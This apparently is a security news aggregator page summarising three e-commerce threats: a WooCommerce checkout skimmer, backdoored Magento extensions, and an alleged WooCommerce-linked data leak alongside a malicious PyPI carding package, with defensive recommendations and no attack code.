CyberSecurity news
FlagThis - #ecommerce
|
@securityonline.info
//
A new and stealthy formjacking malware has been discovered targeting WooCommerce, the popular e-commerce plugin for WordPress. The malware discreetly steals customer payment data from legitimate checkout processes, posing a significant threat to online businesses. Unlike traditional skimmers that simply overlay payment forms, this malware integrates seamlessly into the checkout process, exfiltrating sensitive customer data without raising immediate suspicion.
This sophisticated malware injects a fake payment form into legitimate checkout pages, meticulously mimicking the design and functionality of the actual site. It captures card numbers, expiration dates, CVVs, and personal information like names and addresses. To evade detection, the malware uses the browser's localStorage to silently collect and store cardholder data, ensuring persistence and anti-forensic capabilities. The data theft is triggered when the "Place Order" button is pressed, using the navigator.sendBeacon() method to transmit data asynchronously and silently to a remote Command & Control (C2) server. The infection vector is believed to be through compromised WordPress admin accounts. Attackers inject malicious JavaScript code via plugins like Simple Custom CSS and JS, exploiting their capabilities to insert code dynamically. This allows the malware to monitor user input on checkout fields continuously, capturing data even if the purchase isn't completed. Cybersecurity experts recommend implementing robust security measures, including regular security audits, up-to-date software, and careful monitoring of third-party dependencies, to protect against such attacks.
Share:
References :
Classification:
Pierluigi Paganini@Security Affairs
//
A recent supply chain attack has targeted Magento e-commerce stores, compromising hundreds of online businesses. Sansec researchers uncovered that 21 Magento extensions had been backdoored, leading to the compromise of an estimated 500 to 1,000 e-commerce stores, including a major multinational corporation valued at $40 billion. The attackers gained access to the servers of three Magento software developers – Magesolution, Meetanshi, and Tigren – and modified the source code of the extensions.
The malicious code, a backdoor hidden in the License.php file, remained dormant for six years. The attackers exploited the backdoor in April 2025, deploying malicious code onto Magento stores that had installed the compromised plugins. This backdoor allowed the key holder to run commands on the server, granting them full control of the e-commerce servers and enabling them to steal sensitive information. While removing the compromised extensions will eliminate the initial entry point, experts recommend a thorough check of affected stores to ensure the attackers didn't leave additional web shells for secondary access. Sansec has notified the plugin developers of the breach, but responses have varied, ranging from denial to confirmation of a server hack. Users of Magento e-commerce platforms are urged to investigate their installed extensions and implement security measures to mitigate the risks associated with supply chain attacks.
Share:
References :
Classification:
@cybersecuritynews.com
//
A hacker using the alias "Satanic" has claimed responsibility for a significant data breach affecting WooCommerce, a widely used eCommerce platform. The breach, said to have occurred on April 6, 2025, reportedly compromised over 4.4 million user records. According to the hacker's posts on Breach Forums, the data was not directly extracted from WooCommerce's core infrastructure but from systems closely linked to websites utilizing the platform, potentially through third-party integrations such as CRM or marketing automation tools. The alleged breach has raised concerns about the security of third-party integrations within the WooCommerce ecosystem.
The compromised database reportedly includes an extensive array of sensitive information. This includes 4,432,120 individual records, 1.3 million unique email addresses, and 998,000 phone numbers. It also encompasses metadata on corporate websites, such as technology stacks and payment solutions. A sample of the stolen data reveals records from prominent organizations like the National Institute of Standards and Technology (NIST), Texas.gov, NVIDIA Corporation, the New York City Department of Education, and Oxford University Press. Each record contains detailed information typically found in marketing databases, including estimated revenue, marketing platforms, hosting providers, and social media links. Adding to the woes of WooCommerce users, a separate security threat has emerged with the discovery of a malicious Python package named "disgrasya" on PyPI. This package, detected by the Socket Research Team, contains an automated carding script specifically designed to target WooCommerce stores using CyberSource as their payment gateway. The malware simulates legitimate user behavior to avoid detection while exfiltrating stolen credit card data. Organizations are advised to enable fraud protection rules, monitor for suspicious patterns, implement CAPTCHA or bot protection, and rate limit checkout and payment endpoints to mitigate the risk of automated carding attacks.
Share:
References :
Classification:
|